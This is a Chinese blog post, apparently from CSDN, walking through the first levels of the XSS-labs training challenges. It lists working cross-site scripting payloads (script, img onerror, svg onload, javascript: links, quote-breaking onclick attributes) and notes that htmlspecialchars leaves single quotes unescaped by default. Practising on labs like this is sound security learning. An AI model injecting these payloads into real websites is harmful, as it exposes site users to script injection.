XSSLABS的实践

本文详细记录了在XSSLABS中的一系列闯关实践,涉及JavaScript、HTML编码与解码、事件触发、URL编码、HTTP头部利用等技巧,通过不断寻找未过滤字符和巧妙构造输入来触发弹窗,揭示了XSS攻击的各种策略和绕过方法。
摘要由CSDN通过智能技术生成

一、闯关

        1、修改name后的参数,页面直接显示参数内容,所以替换成JS弹窗代码。查看源码也可以发现调用alert函数后,提示消息并重定向到level2。

#其它命令
<script>alert('1')</script>
<img src=a onerror='alert(1)'>
<svg onload='alert(1)'>
<a href="javascript:alert(1)">我</a>

         2、输入同样被显示出来,可能被参数化。闭合语句即可,可以直接添加"或者">。查看源码可以发现HTML实体编码。

#其余方法
"<script>alert('1')</script>
"onclick=alert('1')>    #提交后点击输入框空白一次

        3、同样是实体编码,对一些字符转义< : &lt和> : &gt和& : &amp和" : &quot。单引号其实也转义了,但代码中htmlspecialchars($str)单引号默认转义还是单引号,所以可以利用。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值